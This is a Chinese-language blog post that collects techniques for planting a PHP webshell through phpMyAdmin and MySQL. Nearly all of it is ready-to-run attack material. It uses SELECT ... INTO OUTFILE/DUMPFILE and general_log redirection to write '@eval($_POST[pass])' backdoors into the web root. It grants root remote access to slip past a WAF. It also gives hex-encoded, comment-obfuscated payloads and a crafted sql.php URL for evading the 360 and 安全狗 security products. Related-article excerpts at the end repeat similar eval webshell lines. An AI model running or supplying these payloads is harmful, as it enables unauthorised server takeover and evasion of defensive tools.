总结下写phpmyadmin写shell的方法

最新推荐文章于 2025-06-04 20:36:49 发布
原创 最新推荐文章于 2025-06-04 20:36:49 发布 · 5.9k 阅读 · 10 ·
CC 4.0 BY-SA版权
我希望自己永远怀着一颗学习的心!
文章标签:

#phpmyadmin写shell

本文介绍了在特定条件下利用MySQL导出WebShell的各种技巧,包括如何设置服务器权限、使用SQL语句创建恶意文件以及绕过常见防护措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

导出WebShell主要条件:
	1.Root数据库用户(root权限)
	2.网站绝对路径(确定有写入权限)
	3.magic_quotes_gpc:Off(关闭)
导出WebShell其它条件:
	1.magic_quotes_gpc:开启时,会对'单引号进行转义,使其变成“\”反斜杠。
	2.secure_file_priv:此配置项用来完成对数据导入导出的限制,如允许导入导出到指定目录。
	3.file_priv:file_priv权限允许你用load_file、into outfile读和写服务器上的文件,任何被授予这个权限的用户都能读和写服务器的任何文件。

查看能否自定义导出文件目录的权限
	show global variables like "%secure%";      //查询secure_file_priv配置
	secure_file_prive=null              //不允许导入导出数据到目录
	secure_file_priv=c:\90sec            //允许导入导出数据到指定目录
	secure_file_priv=''              //允许导入导出数据到任意目录
	secure_file_priv="/"              //允许导入导出数据到任意目录


注:在my.ini、my.cnf、mysqld.cnf文件中找到secure_file_prive并将其值设置为""或"/",重启MySQL服务!


常规导入shell的操作
创建数据表导出shell
CREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL );
INSERT INTO `mysql`.`shadow9` (`content` ) VALUES ('<?php @eval($_POST[pass]);?>');
SELECT `content` FROM `shadow9` INTO OUTFILE 'C:\\phpStudy\\WWW\\90sec.php';
DROP TABLE IF EXISTS `shadow9`;

一句话导出shell:
select '<?php @eval($_POST[pass]);?>' into outfile 'c:/phpstudy/www/90sec.php';  
select '<?php @eval($_POST[pass]);?>' into outfile 'c:\\phpstudy\\www\\90sec.php';
select '<?php @eval($_POST[pass]);?>' into dumpfile 'c:\\phpstudy\\www\\bypass.php';

日志备份获取shell
show global variables like "%genera%";          //查询general_log配置
set global general_log='on';              //开启general log模式
SET global general_log_file='D:/phpStudy/WWW/cmd.php';    //设置日志文件保存路径
SELECT '<?php phpinfo();?>';              //phpinfo()写入日志文件
set global general_log='off';              //关闭general_log模式


当有WAF拦截的时候 我们可以尝试外链 这样提交的数据包不被WAF拦截
grant all privileges on *.* to 'root'@'%' identified by 'root' with grant option;     //开启MySQL外链
flush privileges;                      //刷新MySQL系统权限相关表

这里的这些技巧是从别人那边收集过来的 感谢!!!
绕过360 (通过内联注释)
select '<?php @eval($_POST[pass]);?>' into /*!50001outfile*/ 'c:/phpstudy/www/bypass.php';

绕过网站安全狗<4.0 (通过hex编码)
select 0x3c3f7068702024613d636f6e766572745f75756465636f646528222638372d5339372954206022293b40246128245f504f53545b27212a21275d293b3f3e into outfile 'C:\\phpStudy\\WWW\\bypass.php';

绕过安全狗4.0 通过hex编码+内联注释
/*!50001select*/ 0x3c3f7068702024613d636f6e766572745f75756465636f646528222638372d5339372954206022293b40246128245f504f53545b27212a21275d293b3f3e into outfile 'C:\\phpStudy\\WWW\\bypass.php';


绕过server_sql.php、tbl_sql.php、db_sql.php + 安全狗导出WebShell
以上的三个文件的作用是(执行SQL语句)
但是如果被删除了可以通过以下的方法
(1)token需要
(2)自己选择一个数据库和数据表
(3)参数pos=0
&sql_query=/*!50001select*/ 0x3c3f7068702024613d636f6e766572745f75756465636f646528222638372d5339372954206022293b40246128245f504f53545b27212a21275d293b3f3e into outfile 'C:\\phpStudy\\WWW\\bypass.php';




例如 http://127.0.0.1/phpmyadmin/sql.php?db=数据库名&token=token值&table=数据表名&pos=0&sql_query=/*!50001select*/ 0x3c3f7068702024613d636f6e766572745f75756465636f646528222638372d5339372954206022293b40246128245f504f53545b27212a21275d293b3f3e into outfile 'C:\\phpStudy\\WWW\\bypass.php';
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 2369
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询入webshell4、创建数据库和表入webshell: 1、日志文件 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面入内容的话,那么就可以成功 getshell
phpmyadmin后台GetShell总结
李火火的安全圈
02-18 638
文章目录前言一、phpmyadmin简介二、phpmyadmin寻找、登录三、利用函数入文件四、secure_file_priv函数五、日志文件入Webshell六、通过慢查询方式getshell七、phpmyadmin4.8.1远程文件包含漏洞影响版本漏洞分析及复现漏洞防范 前言 文章仅用于技术学习与安全研究,切勿用于非授权下的渗透行为,出现任何后果与本文作者无关。 !!!且行且珍惜!!! 一、phpmyadmin简介 phpmyadmin是一个以PHP为基础,以web-base方式架构在网站
磐云P10 P057-综合渗透测试-使用反弹木马进行提权获取主机Shell
最新发布
2401_82751127的博客
06-04 627
磐云P10 P057-综合渗透测试-使用反弹木马进行提权获取主机Shell解析
登录phpmyadmin获取系统shell
R3332136304的博客
06-28 442
在对目标系统进行目录扫描时发现该web系统存在phpinfo信息泄露以及phpmyadmin管理后台 目录扫描工具为 dirsearch 访问 phpmyadmin 发现存在弱口令 root/root 由于 phpmyadmin 可以直接执行sql语句,所以想直接通过 phpmyadmin 执行 sql 语句读取文件以及入 webshell。 执行 SHOW GLOBAL VARIABLES LIKE "%secure_file_priv%" 发现值为NULL,无入读文件权限。 mysql 数据库中
phpadminshell的四种方式
weixin_46365325的博客
07-19 1536
场景:当你拿下phpmyadmin后台之后,如何进行下一步操作。
phpMyadminshell
wangyanjienice的博客
04-07 1171
select into outfile 使用方法 select load_file('C:/phpStudy/MySQL/shell.php') select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/MySQL/shell.php'; 1.查看绝对目录 select @@basedir; 2.查看入权限 SHOW VARIABLES LIKE "secure_file_priv"; NULL表示禁止,无法
phpMyAdmin 4.0.10 文件包含 -> getshell
2301_80115097的博客
06-25 1008
gettype() 获取参数的属性也就是说我们的$var需要是一个数组这里的返回值就是True了还是刚刚说的那些,这里如果是Linux服务器的话,并且sql文件储存路径有大小的话,就没办法拿到webshell了,并且还不能任意文件包含,还只能包含路径没有大字符的,反正至少以我目前的水平是不行的,不过 linux 默认mysql文件的路径是 /var/lib/mysql/。默认情况下是无影响的。
mysql的shell_基于mysql下的几种shell方法
weixin_35212670的博客
01-18 3010
0x00关于mysql下的shell方法网上基本很多了,我原本也没打算总结总结的,毕竟网上已经很多了,不过在看 kilon 大佬的博客的时候,给我的感受就是明明一个几句话的东西,总能详细的,有条有理的记录下来,所以也正是如此,才有了这篇文章。0x01利用条件数据库当前用户为root权限知道当前网站的绝对路径PHP的GPC为 off状态入的那个路径存在入权限0x02基于联合查询法下的两个入方...
phpMyAdmin到getshell
weixin_44940180的博客
08-17 316
想要使用into outfile或者load_file需要先查看secure_file_priv 如果后面有路径,表示上传文件至某个路径 若为null,则表示不可以使用into outfile上传文件 如果在命令行直接设置,则会报错,表示它是一个只读变量 所以如果一旦这里为null,无法使用into outfile来上传后门 SHOW VARIABLES LIKE '%general%'; 查看日志文件功能是否开启以及文件路径 默认的样子 SET GLOBAL general_log='on'
phpmyadmin上传Webshell总结
afei001
08-31 601
目录 1.select查询输出webshell (1)创建表并INTO OUTFILE入一句话 (2)select ... INTO OUTFILE入一句话 2.通过构造命令执行拿shell (1)构造命令执行 (2)命令执行使用system()函数报错解决 3.secure_file_priv值不为空解决办法 4.通过数据库日志入webshell (1)通过查询日志入webshell (2)通过慢查询日志入webshell 5.菜刀连接Windows和Linux系统区别
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
phpmyadmin后台getshell方法学习总结
0nc3的博客
11-06 3230
0x00 前言 最近看的一篇文章中提到过phpmyadmin一些后台getshell方式,就想着篇博客学习总结一下~~ 0x01 getshell方法 一、select into outfile直接入 1.利用条件 对web目录需要有权限能够使用单引号 知道绝对路径 没有配置secure_file_priv 2.步骤 先使用show global variables like '%secu...
phpmyadmin 后台拿webshell
黄×的技术bolg
03-08 595
1:phpmyadmin 后台拿webshellphpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.phphttp://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径D:\usr\www\html\phpMyAdmin\----start code---Cr...
复现phpmyadmin后台getshell—新手小白跟练版
weixin_65399093的博客
09-13 290
在安全测试渗透过程中,"getshell"通常指的是获得目标系统的shell访问权限。也就是黑客或测试者通过漏洞或其他手段,获取到对目标系统的控制权限,能执行命令或操作系统。明确是什么getshell后,让我们正式开始复现漏洞吧!
PhpMyadmin后台拿webshell方法总结
浅笑996的博客
06-29 4138
前言: phpmyadmin后台拿webshell方法主要分为两个方法: (1) 、通过日志文件拿webshell; (2) 、利用日志文件入一句话;(这个方法可能在实际操作中会遇到困难); 本地搭建环境: Phpmystudy 2018 PHP--5.5.38 一、日志文件入一句话来获取webshell: (1) 、首先我们先利用日志文件入一句话来获取webshell,日志文件入的思路利用mysql的一个日志文件。我们执行的每一个sql语句都会被保存到日志中,换个思路想一下把这个
phpmyadmin通过日志shell
m0_53087192的博客
01-07 1014
1.查看general log是否开启 show variables like ‘%general%’; 打开general_log日志读功能 SET GLOBAL general_log=‘on’; SHOW VARIABLES LIKE ‘%general%’; 查看绝对路径(探针等) shell,会把执行的语句shell.php,然后我们查询一下 SET GLOBAL general_log_file=‘C://phpStudy//PHPTutorial//WWW//shel
mysql 开启日志 shell_Phpmyadmin日志getshell
weixin_39531378的博客
01-19 666
这个算是一个很常见也很基础的getshell的方式,昨天有个小伙伴问到我这个问题,说面试的时候主管给了他一个phpmyadmin登录入口,让他getshell,由于实战经验较少,小伙伴那道题没拿到分。其实,看到phpmyadmin,第一反应就应该是日志getshell。为了防止大家继续踩坑,特地科普一波。大家看了以后记得在本地phpstudy环境内动手测试一下,以免后面再遇到这类面试题不知道怎么...
PHPmyadmin Getshell
Grey的博客
07-21 6996
1. phpMyAdmin简介 2. phpMyAdmin getshell思路 3. phpMyAdmin 4.8.1 getshell实战 SHOW VARIABLES LIKE ‘%secure_file_priv%”;   查看读文件路径 “secure_file_priv”对应的值不能为null,为null就没办法正常shell 我们首先需要检测的是MyS...
Docker部署LNMP与phpMyAdmin的详细步骤
总结来说,本文提供了使用Docker部署LNMP和phpMyAdmin的详细步骤,包括创建自定义网络来固定容器IP、拉取和启动相关服务的Docker镜像、挂载配置文件和数据卷以及设置容器间的链接。这样的部署方式便于管理和维护,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值